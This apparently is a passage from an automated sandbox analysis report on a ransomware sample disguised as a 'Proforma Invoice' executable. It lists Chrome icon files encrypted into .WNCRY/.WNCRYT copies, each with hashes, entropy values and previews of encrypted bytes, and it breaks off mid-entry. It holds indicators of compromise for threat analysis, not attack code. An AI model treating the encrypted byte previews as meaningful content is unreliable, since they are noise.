                                                          Preview:WANACRY!...."...".....:z.Y.).. .+.W.D.;vv....X.{,>........Z.X.h.......P.v; .....Ro`..l.(. &..l{..d._..#..z}....Z(.g...2....K..l.<.K.21.GUbd.+!.F0.......Y....3...$g..(......M$..R..2...).Y. .....tm.3.....Y..9........*0&C27U...k=C....^.~M..E...C....(.....M.................b...x.A....h..(.HcG. +p..*U.....V}h"......X.xf[..$..-&..{..M..|...h...\.....sC.(.}).c..1....Q..N.9.&..aS.K..n.../...F..B..xE.G....n.Qw...3&9<... ...|..F}.u0[...k.e.6...*.rV....t.+.D..y9e.{...7......&.-.l...b.2.|.H..9......:....5..9R.O...$J

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):536
                                                          Entropy (8bit):7.530288430810619
                                                          Encrypted:false
                                                          SSDEEP:12:bkEQZeEdZvo0JrPO52JSyps+LMrZjizOQ/pVnERDI0nogdID:bk5dZvo0dOUnoZFQ/rKIqoRD
                                                          MD5:BCC771E9CFBE349D357208AE163D02A0
                                                          SHA1:F2E590A420AD008C414E8A17C42E326A46AA2E19
                                                          SHA-256:7FF087189A67196C8E46FAB55EAC689A4C7CFEE566B252DC65CDD74356F7A4D7
                                                          SHA-512:5A0990AD885B630EE7A3C33462C29615BF08432B07E5328739DF5AE92977A8EC0BD40920E7434FB8C75220AD69E9A72701694B41DF74A1769F59C5E5C4AF3845
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."...".....:z.Y.).. .+.W.D.;vv....X.{,>........Z.X.h.......P.v; .....Ro`..l.(. &..l{..d._..#..z}....Z(.g...2....K..l.<.K.21.GUbd.+!.F0.......Y....3...$g..(......M$..R..2...).Y. .....tm.3.....Y..9........*0&C27U...k=C....^.~M..E...C....(.....M.................b...x.A....h..(.HcG. +p..*U.....V}h"......X.xf[..$..-&..{..M..|...h...\.....sC.(.}).c..1....Q..N.9.&..aS.K..n.../...F..B..xE.G....n.Qw...3&9<... ...|..F}.u0[...k.e.6...*.rV....t.+.D..y9e.{...7......&.-.l...b.2.|.H..9......:....5..9R.O...$J

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.502060510489496
                                                          Encrypted:false
                                                          SSDEEP:12:bkEHhkVwgbQ1K0jMEgwGCIt1p8aAwssQKs39:bko2Dx0gLwnItr/1ssQKst
                                                          MD5:8DB6DC070D22AFF9900EA427D0F6367C
                                                          SHA1:FCCF241A8B8B35102C762B42AAFB580820971243
                                                          SHA-256:D905DB65383DEAE3052AD44BED87B71CD047B1862B86CE4D40036D62CD5FC21C
                                                          SHA-512:B09C25903684AD9241656BF6B866A45663AE312FFF4E5B778C02F3D141F5AE4C307EA8CD361B330A09D066DA18956B7ECE555E92B367F4A5DDDE39DA15B5F8AC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@..F.G..A]..C......./.*.{.o....;..........p.]....,5.6E..j...Yc?..g...~@.... ...v.....g"......}Je.b.d<T...!..#>...$..R.f7l.....S.RO.L....0.=.L..*.c...:2vCPi.&..3...|.xu.*.l\]...}'.>.._@..4../8.9<.o k}.6..l.....S.-+.R..X.r..2.XQzi..5..q<.c.m.w0..1....................K.h9m..8.}...#r..T{..V......O.'>.s.gy.+.D..5h....db.d.S.7.R{VM.......).E....{D.vT...Z<.?1...]...Z'.z..:V...9...\. .w;FM5...2B..CF%....F%....T...&.%N~;>

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.502060510489496
                                                          Encrypted:false
                                                          SSDEEP:12:bkEHhkVwgbQ1K0jMEgwGCIt1p8aAwssQKs39:bko2Dx0gLwnItr/1ssQKst
                                                          MD5:8DB6DC070D22AFF9900EA427D0F6367C
                                                          SHA1:FCCF241A8B8B35102C762B42AAFB580820971243
                                                          SHA-256:D905DB65383DEAE3052AD44BED87B71CD047B1862B86CE4D40036D62CD5FC21C
                                                          SHA-512:B09C25903684AD9241656BF6B866A45663AE312FFF4E5B778C02F3D141F5AE4C307EA8CD361B330A09D066DA18956B7ECE555E92B367F4A5DDDE39DA15B5F8AC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@..F.G..A]..C......./.*.{.o....;..........p.]....,5.6E..j...Yc?..g...~@.... ...v.....g"......}Je.b.d<T...!..#>...$..R.f7l.....S.RO.L....0.=.L..*.c...:2vCPi.&..3...|.xu.*.l\]...}'.>.._@..4../8.9<.o k}.6..l.....S.-+.R..X.r..2.XQzi..5..q<.c.m.w0..1....................K.h9m..8.}...#r..T{..V......O.'>.s.gy.+.D..5h....db.d.S.7.R{VM.......).E....{D.vT...Z<.?1...]...Z'.z..:V...9...\. .w;FM5...2B..CF%....F%....T...&.%N~;>

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):456
                                                          Entropy (8bit):7.545754798387096
                                                          Encrypted:false
                                                          SSDEEP:6:bkEYkl2qCdE7AU/p1qfIIOwRxEdl1yc/VkbeiqX7liMwk1elDi3NZLbnMjpmlyOJ:bkEYv6D/RvtgWn42NtnldSKpkR/pOxp
                                                          MD5:90F4268D15BC580AABB3649A2099477E
                                                          SHA1:01775E51F730F5171814B684BE508E6F0F11C3A9
                                                          SHA-256:5151223DD4A267F42FE63FA68814AA94E9B6287DA9AB08F291D56000CA0F0B60
                                                          SHA-512:93141881C2F86DB587130C39C12298B29DB5B3ABEE0E8A7E84855A6B39B2491FCA82979E12A11F87181E7436148422C1EE43FA92FC6DF5E5B39BF45F34743D0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....JRS'>....G>.F.9UQ.i....`.P.R(..c...a.r@5....`.)M....wVhF........b!mm.A....xn%nd.h.N[.g...<.Z..z..&...-..k..>f<7.`=^X..1|..|...v...D....au....o.T_.!"O...H.[...c.....}... ....E=...QZ...^...^T..d.2..;....T.{...JK...o$............x.{.Qp,7.#.<.S....K..............9..p...-...&..F..zC._P../R=.....V.....>...B........R....2y.T.S..ej.K.M.....y...F..'...l.........tap..A...3.5.>.....4.@..;.Ay`..f.m..~.C.r...z_VV.Z......`.....<WS..k.'y

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):456
                                                          Entropy (8bit):7.545754798387096
                                                          Encrypted:false
                                                          SSDEEP:6:bkEYkl2qCdE7AU/p1qfIIOwRxEdl1yc/VkbeiqX7liMwk1elDi3NZLbnMjpmlyOJ:bkEYv6D/RvtgWn42NtnldSKpkR/pOxp
                                                          MD5:90F4268D15BC580AABB3649A2099477E
                                                          SHA1:01775E51F730F5171814B684BE508E6F0F11C3A9
                                                          SHA-256:5151223DD4A267F42FE63FA68814AA94E9B6287DA9AB08F291D56000CA0F0B60
                                                          SHA-512:93141881C2F86DB587130C39C12298B29DB5B3ABEE0E8A7E84855A6B39B2491FCA82979E12A11F87181E7436148422C1EE43FA92FC6DF5E5B39BF45F34743D0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....JRS'>....G>.F.9UQ.i....`.P.R(..c...a.r@5....`.)M....wVhF........b!mm.A....xn%nd.h.N[.g...<.Z..z..&...-..k..>f<7.`=^X..1|..|...v...D....au....o.T_.!"O...H.[...c.....}... ....E=...QZ...^...^T..d.2..;....T.{...JK...o$............x.{.Qp,7.#.<.S....K..............9..p...-...&..F..zC._P../R=.....V.....>...B........R....2y.T.S..ej.K.M.....y...F..'...l.........tap..A...3.5.>.....4.@..;.Ay`..f.m..~.C.r...z_VV.Z......`.....<WS..k.'y

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.503145280886426
                                                          Encrypted:false
                                                          SSDEEP:12:bkEZIV77l0nxipaZR085WW4TwF3cJVo9znJDYwTaTO:bkx77l0n4qx4WOW3cJVI9YyEO
                                                          MD5:99C28323C4BA450CE7C3847DB9A45AED
                                                          SHA1:6F3625B3B1E2FD6A4FBE3FF442F952687CDA6EC9
                                                          SHA-256:24225ABB88787095E4841D0836D6D8681FF5DB47E36446454A6F4A279A62639C
                                                          SHA-512:0F32193227A62931107CBFAF4CB574AC0A2F65E2502E50EEA1CFADC7DDC0B0ED2932E4D23A303832154EA60B42C26646240B03999EF2B15D2362F38584D74D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......r.Z..].L...$oz\"{.c..Yc....zS.J.G...............]...a.j^n.....N.....*.......f$...$../....Q7.!.1..TqD..GBq.....#...,.~Qu`q4E)G$.9.R..Ej...<....Mr_}G..r.y..H......r...$.z..:.c'.7..Z^r...1.'......5..%.w.....=..F.D>.m4v....(..Z6...F..j%.}.............{.[.....9cXP.EB.ri.e..^.....&.."RU....w/F>iM..."...-..........<(254........d3....%.....#.......U,.]..(.i.. )i..O.8.f.A99...V`7..t.a../<B..Mse..4q..F'I..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.503145280886426
                                                          Encrypted:false
                                                          SSDEEP:12:bkEZIV77l0nxipaZR085WW4TwF3cJVo9znJDYwTaTO:bkx77l0n4qx4WOW3cJVI9YyEO
                                                          MD5:99C28323C4BA450CE7C3847DB9A45AED
                                                          SHA1:6F3625B3B1E2FD6A4FBE3FF442F952687CDA6EC9
                                                          SHA-256:24225ABB88787095E4841D0836D6D8681FF5DB47E36446454A6F4A279A62639C
                                                          SHA-512:0F32193227A62931107CBFAF4CB574AC0A2F65E2502E50EEA1CFADC7DDC0B0ED2932E4D23A303832154EA60B42C26646240B03999EF2B15D2362F38584D74D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......r.Z..].L...$oz\"{.c..Yc....zS.J.G...............]...a.j^n.....N.....*.......f$...$../....Q7.!.1..TqD..GBq.....#...,.~Qu`q4E)G$.9.R..Ej...<....Mr_}G..r.y..H......r...$.z..:.c'.7..Z^r...1.'......5..%.w.....=..F.D>.m4v....(..Z6...F..j%.}.............{.[.....9cXP.EB.ri.e..^.....&.."RU....w/F>iM..."...-..........<(254........d3....%.....#.......U,.]..(.i.. )i..O.8.f.A99...V`7..t.a../<B..Mse..4q..F'I..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8248
                                                          Entropy (8bit):7.97803983600239
                                                          Encrypted:false
                                                          SSDEEP:192:gWHkX3+Yc0/W0Y2ib/48WLXWojrkNxjqBH2XKMt6FdB:gWHkH+Yc0/W0Y2sv0WWKjqcXKuKB
                                                          MD5:4D7A06B8D9B31FF8A3540DBE612465AD
                                                          SHA1:9F64A39E59D43913E5ABDB5F53097BA7A3106372
                                                          SHA-256:E9507471EB677EC2CFC1D509EAD85B4282A5C55C067B4E2CD3D94CBAE6124E68
                                                          SHA-512:45970EDFD007321B34F770F687896603DA81A5825D1FB78CB5EF4E12F2150840AC6CF797437AD26757334901BAFC02F5B9B5CC035F3E3C3951D571623EC571F9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....U.&A.;).._......8..L..,...S`.$....-.i...k..n.|2.....V3.Df..G.C..=.....)9/....../..G....I.eF..0...U.d.L..q.w...J).xXv#v..G.>.........0.".V.8.....q.n..0,...4.lPJ.E^.....8...ttN..5.6G.Z.D...d.}p...\..YnO.]..r..N..N.M.[......j@.....4..s...~..................B.-AM.u.5<.....r1.W.l......R........U.....M%.q...3k.eo!...e.e}[....n..3..a........$J\.../;;..jh.fFH....N.S.h...S...d.."..h...\..OR...L.L.M...........@=..,f!p...^..'k...!.C.....d.....$[...T....xTS..k...Sj.z....^.1...ht..4.J..$)@...........5..Y...us...^[A!...f.p.y.4"."yc.\Iy......`.}>.n...6...i4..w.8..Mj....c.'.D'..+:.o..d.....9.d..;=.Q..C...:.7.|.Ab.<..F..6...!b.s..,..FV....\........k...g.Z.... ....1....OB....\.J.l......^buj...S........u1.mN.d..2.%^....e....!/0'...x...H.di......PFT..A-.?R,%.@..O...>U+.G..n.Jb........F5.....i!..Q...x....8.f~...9,..O,....1..{T..._...V....T=.Hd..-.y......s..~...~M-z.cu...........e.Bs8....m.....Q.....Wg.....;$...8^[.4..^O.as.>....{&..W..x....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8248
                                                          Entropy (8bit):7.97803983600239
                                                          Encrypted:false
                                                          SSDEEP:192:gWHkX3+Yc0/W0Y2ib/48WLXWojrkNxjqBH2XKMt6FdB:gWHkH+Yc0/W0Y2sv0WWKjqcXKuKB
                                                          MD5:4D7A06B8D9B31FF8A3540DBE612465AD
                                                          SHA1:9F64A39E59D43913E5ABDB5F53097BA7A3106372
                                                          SHA-256:E9507471EB677EC2CFC1D509EAD85B4282A5C55C067B4E2CD3D94CBAE6124E68
                                                          SHA-512:45970EDFD007321B34F770F687896603DA81A5825D1FB78CB5EF4E12F2150840AC6CF797437AD26757334901BAFC02F5B9B5CC035F3E3C3951D571623EC571F9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....U.&A.;).._......8..L..,...S`.$....-.i...k..n.|2.....V3.Df..G.C..=.....)9/....../..G....I.eF..0...U.d.L..q.w...J).xXv#v..G.>.........0.".V.8.....q.n..0,...4.lPJ.E^.....8...ttN..5.6G.Z.D...d.}p...\..YnO.]..r..N..N.M.[......j@.....4..s...~..................B.-AM.u.5<.....r1.W.l......R........U.....M%.q...3k.eo!...e.e}[....n..3..a........$J\.../;;..jh.fFH....N.S.h...S...d.."..h...\..OR...L.L.M...........@=..,f!p...^..'k...!.C.....d.....$[...T....xTS..k...Sj.z....^.1...ht..4.J..$)@...........5..Y...us...^[A!...f.p.y.4"."yc.\Iy......`.}>.n...6...i4..w.8..Mj....c.'.D'..+:.o..d.....9.d..;=.Q..C...:.7.|.Ab.<..F..6...!b.s..,..FV....\........k...g.Z.... ....1....OB....\.J.l......^buj...S........u1.mN.d..2.%^....e....!/0'...x...H.di......PFT..A-.?R,%.@..O...>U+.G..n.Jb........F5.....i!..Q...x....8.f~...9,..O,....1..{T..._...V....T=.Hd..-.y......s..~...~M-z.cu...........e.Bs8....m.....Q.....Wg.....;$...8^[.4..^O.as.>....{&..W..x....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5976
                                                          Entropy (8bit):7.97019057849541
                                                          Encrypted:false
                                                          SSDEEP:96:oOrysT/Q6WAv8Ze79ROKvup5b2eAO5Jbt6BHL5GgRvOZa4OVRdWoTzodWqLmLScL:nT/FWSR2p0vOrY422ZVOVRdWFWimLSrC
                                                          MD5:A70B94B87D99389078C40B1CB83C6608
                                                          SHA1:95F1363262B6CCD715DC8FE563CDB2216FF9F7AF
                                                          SHA-256:6BA085B42818B076C913B9AFA71DB28BF265F9C3A598F50625EBBB81A0F75313
                                                          SHA-512:027EA99A6042FB2C1EE230649437D0F95300B7E26FFD92FD3864BE4166ADEB1C2BC86582FEB324A71CAF5AE5959EC2C38B6F838E50E9F32E73D0001C91776EC2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<h%..E.6...d..t+.4.>.U..p...5R..z.:Z.R.h.M....'..g....R ..a.i.Zc.{W..V.{WV.)>.8....)5$...4..J..m...A..UJ[O#.L=......EgXY....[D.H..z.M..G..l..W?D.B......H...]..c.....O..IO'....b.....'..f...&...(..|.v...G...1..M..7pX.....X.D ..../T.6...\.u.@fJ..v....9.......yM.....V/.B\-....R.V..`4...u..Q.Yr3..;}....x@....n.|..J.'.-.k..H(.$......^...m....&..C1..<WI..G.F..h.#..3...cc.s.."79f...p....WJL.r..J{C...,...l.b.'.....D.Q.v.....6... ... /C..?.I>._.b.:...S...3.D.....SO#...i...Cc..y..%C...:.....U..i..p7.i.....z..[.B0p..k?u....4\|r......7..K...g......)..~.....~W(r[...u0mCk.].........)@.e..P(.F.....MfW.../.-.....I..T^..4H...R..7y.7.F.,F.pE........GK.@.R..m.qJ.B.\@.e.F@.(..v.....z..L.w..&)...z....fH...9.).A.8.d....;.r2....#..]..x.b..(...-.^..Q.".g..0...s.....@.,. g..|....|[+..D.J^.Bq|..c...l0#._,..=........V.8.lU...../.&3..l.pjK...+.w]..r..k...Kz...{..y.B....S.....Pt.....*..ud.rG.Iv..}...I.Qs...a....P....7...U...").a.d.ZW.I:....|j@..v..`.=.,.KG

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5976
                                                          Entropy (8bit):7.97019057849541
                                                          Encrypted:false
                                                          SSDEEP:96:oOrysT/Q6WAv8Ze79ROKvup5b2eAO5Jbt6BHL5GgRvOZa4OVRdWoTzodWqLmLScL:nT/FWSR2p0vOrY422ZVOVRdWFWimLSrC
                                                          MD5:A70B94B87D99389078C40B1CB83C6608
                                                          SHA1:95F1363262B6CCD715DC8FE563CDB2216FF9F7AF
                                                          SHA-256:6BA085B42818B076C913B9AFA71DB28BF265F9C3A598F50625EBBB81A0F75313
                                                          SHA-512:027EA99A6042FB2C1EE230649437D0F95300B7E26FFD92FD3864BE4166ADEB1C2BC86582FEB324A71CAF5AE5959EC2C38B6F838E50E9F32E73D0001C91776EC2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<h%..E.6...d..t+.4.>.U..p...5R..z.:Z.R.h.M....'..g....R ..a.i.Zc.{W..V.{WV.)>.8....)5$...4..J..m...A..UJ[O#.L=......EgXY....[D.H..z.M..G..l..W?D.B......H...]..c.....O..IO'....b.....'..f...&...(..|.v...G...1..M..7pX.....X.D ..../T.6...\.u.@fJ..v....9.......yM.....V/.B\-....R.V..`4...u..Q.Yr3..;}....x@....n.|..J.'.-.k..H(.$......^...m....&..C1..<WI..G.F..h.#..3...cc.s.."79f...p....WJL.r..J{C...,...l.b.'.....D.Q.v.....6... ... /C..?.I>._.b.:...S...3.D.....SO#...i...Cc..y..%C...:.....U..i..p7.i.....z..[.B0p..k?u....4\|r......7..K...g......)..~.....~W(r[...u0mCk.].........)@.e..P(.F.....MfW.../.-.....I..T^..4H...R..7y.7.F.,F.pE........GK.@.R..m.qJ.B.\@.e.F@.(..v.....z..L.w..&)...z....fH...9.).A.8.d....;.r2....#..]..x.b..(...-.^..Q.".g..0...s.....@.,. g..|....|[+..D.J^.Bq|..c...l0#._,..=........V.8.lU...../.&3..l.pjK...+.w]..r..k...Kz...{..y.B....S.....Pt.....*..ud.rG.Iv..}...I.Qs...a....P....7...U...").a.d.ZW.I:....|j@..v..`.=.,.KG

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19880
                                                          Entropy (8bit):7.989871390341088
                                                          Encrypted:false
                                                          SSDEEP:384:7IQm0pJN2ulQEq8nA6uLxTzWf0DCqiuYpXI5tvBg7UmHpEJ3jfF0akcbj8OH4:7Dm0HlQp8A6CTzWfO7qXI5oJG3TtsOY
                                                          MD5:42AB4AEAA9D5DF71C4CA7926B11C4D5A
                                                          SHA1:BEFD3DF2DE76C6F7B42DE8C255A3D9E3AA983051
                                                          SHA-256:DEA704534E634E576718B724AA62D9284025D9B2B6E848935132F384CF706A08
                                                          SHA-512:E776EC938E592F6ECA99037BB74518013276C35FD925674887F2A093A5DD47FA0CC927F991FA8BA8F064562604CA17ACC87726F4F4975E7617D3B6E868B5B008
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1....".[...D...s...R}.E.Az.h.......2T.;.d.....V...L.p.s_..h.!^q.?..w..e...nO....O.(...y...8'..-.W....G?.... ...W$.;..:c7..H....B..\(cZNO..bV....M.s...1r..W.....QG.`..I..l.$=..@{.hm..oja.?,.......U.t...o.,R.{]kV.]?P$*d!.Nu..'X1.J._.h...[%...h{$..].....L........S0.W...i......^.kgp{.h.I..?).......x..~&}....@?^....L.u..PX.,...T.h..B..9.y.AA#+*.&.....1...|..v.c..lg.../.Y11eB.....x5......q.b..Rh:pT.._..C..a.j.b.S.1..'Q.C...."....+..."-..1..S.u.v.R?..dr.-n.W.......B.....`.".-....._..y..IU. N$.....\.Le..6...>.[..{g.V]8\.f.$O..y..Uzc....99...M...4.3.e.3......l..@W.i..tJ4..)(.....^8u.K..=...R....I+.Z.E.......Q..d...&.C./.q.......[.8.#u..aP+N..a...Qm@....4..y.M5...s.lq.B.SLcb_..J.....+..W.p.2...=.D2.c.yl|...s..9......?t>......+. .d.v."D.....s\u....G..)[......d....`.w..2m..Z.l.........;...O.L6.'>.Zz..a'.}.....m#b.]qt.[.cW..l..1.F....3..ILR.<..yM...T...q.U.....D........h...z_nai.'..i}UE1...:.x0..)W.....S...bTsgl.cN2.Ao..>&./.....I.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19880
                                                          Entropy (8bit):7.989871390341088
                                                          Encrypted:false
                                                          SSDEEP:384:7IQm0pJN2ulQEq8nA6uLxTzWf0DCqiuYpXI5tvBg7UmHpEJ3jfF0akcbj8OH4:7Dm0HlQp8A6CTzWfO7qXI5oJG3TtsOY
                                                          MD5:42AB4AEAA9D5DF71C4CA7926B11C4D5A
                                                          SHA1:BEFD3DF2DE76C6F7B42DE8C255A3D9E3AA983051
                                                          SHA-256:DEA704534E634E576718B724AA62D9284025D9B2B6E848935132F384CF706A08
                                                          SHA-512:E776EC938E592F6ECA99037BB74518013276C35FD925674887F2A093A5DD47FA0CC927F991FA8BA8F064562604CA17ACC87726F4F4975E7617D3B6E868B5B008
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1....".[...D...s...R}.E.Az.h.......2T.;.d.....V...L.p.s_..h.!^q.?..w..e...nO....O.(...y...8'..-.W....G?.... ...W$.;..:c7..H....B..\(cZNO..bV....M.s...1r..W.....QG.`..I..l.$=..@{.hm..oja.?,.......U.t...o.,R.{]kV.]?P$*d!.Nu..'X1.J._.h...[%...h{$..].....L........S0.W...i......^.kgp{.h.I..?).......x..~&}....@?^....L.u..PX.,...T.h..B..9.y.AA#+*.&.....1...|..v.c..lg.../.Y11eB.....x5......q.b..Rh:pT.._..C..a.j.b.S.1..'Q.C...."....+..."-..1..S.u.v.R?..dr.-n.W.......B.....`.".-....._..y..IU. N$.....\.Le..6...>.[..{g.V]8\.f.$O..y..Uzc....99...M...4.3.e.3......l..@W.i..tJ4..)(.....^8u.K..=...R....I+.Z.E.......Q..d...&.C./.q.......[.8.#u..aP+N..a...Qm@....4..y.M5...s.lq.B.SLcb_..J.....+..W.p.2...=.D2.c.yl|...s..9......?t>......+. .d.v."D.....s\u....G..)[......d....`.w..2m..Z.l.........;...O.L6.'>.Zz..a'.}.....m#b.]qt.[.cW..l..1.F....3..ILR.<..yM...T...q.U.....D........h...z_nai.'..i}UE1...:.x0..)W.....S...bTsgl.cN2.Ao..>&./.....I.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2104
                                                          Entropy (8bit):7.9182551444366
                                                          Encrypted:false
                                                          SSDEEP:48:bkPyc2sVYO92zJhZZTR4g3/6iWA7qiXYBoU0fJ5KZiIG08UrU:oP/XYO92lz9v5XEi5081
                                                          MD5:32B6E813CA9DBFE7BD67AEBA04C70018
                                                          SHA1:E36310CE1D8E8D0E615C49DD16BF9707EE2937B8
                                                          SHA-256:1BD43DD89C9493098AE048265E3E5614EA8AF3B91BEC4FFDE10A3AA625FAA556
                                                          SHA-512:39D8AC1D41FA3434227BEDA123B817ADEC51DEB047A6135D2A4A1BE097690338E69284C0E8B3244454BA8EB28EE0D3B9BA00B7EDF4E67E953C3CC5C56D1BC020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........+k$,.K).<.}...C...(4..X...7...^./.].?..2M...h........H.._...5..\G.<..\...FD.Y..GZ.`......yu...b0...C0...I.......Of./Y..4.J.6..(.....i...e...yF{.x3`Z.E.B.f...v.B&E"TE.......]t....$.jJ|Tn..s..X....J5.....jm<;.8.*.4Q.{.Pt.o.K-7..I=...a...............?..o.%Vy.L..M<.'.Pe...0..Cn...R..,.`.^l...b..gI.>.@_xTP.WB.K'.3.g=(...N..k.:6W.=Aj..8..~U.2X..x;...b...a!V&p.pX.".....j..a..Mx/w.v(...k.J.6.~....z.f..4B.^|........+DF.\]w!.....0.i...0)..2........k3.I`...1.i.f...........Y..l'.KY[..:.....~...".i.7....S..D3.<.5.M...O!....V...1.....YgX_.&o. .M.U.V8......W.... Q".+.O.akr.._......!..%F......[7!....((.u";qF........@..?"V7J...xLwr.H..=..$.`.}L.....>.c={.......7.4G...2/.R..Z...:nO.r...Y.5.[B6...Fs.v..g.m...".fy.V...".......e.r......s.....|y^...W.RVK.....>%,.F+.^.9.i.......s....$...s..J.....Z...~..).8.c.A{...5.....a...E...@e.>.?.....!........GV.0%*.../........9....c.......... ...k..)...+54...Z.o.!..i...@18W...t.E.s./.Y.u.@.c8..s".8C.x6T1...MBBK.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2104
                                                          Entropy (8bit):7.9182551444366
                                                          Encrypted:false
                                                          SSDEEP:48:bkPyc2sVYO92zJhZZTR4g3/6iWA7qiXYBoU0fJ5KZiIG08UrU:oP/XYO92lz9v5XEi5081
                                                          MD5:32B6E813CA9DBFE7BD67AEBA04C70018
                                                          SHA1:E36310CE1D8E8D0E615C49DD16BF9707EE2937B8
                                                          SHA-256:1BD43DD89C9493098AE048265E3E5614EA8AF3B91BEC4FFDE10A3AA625FAA556
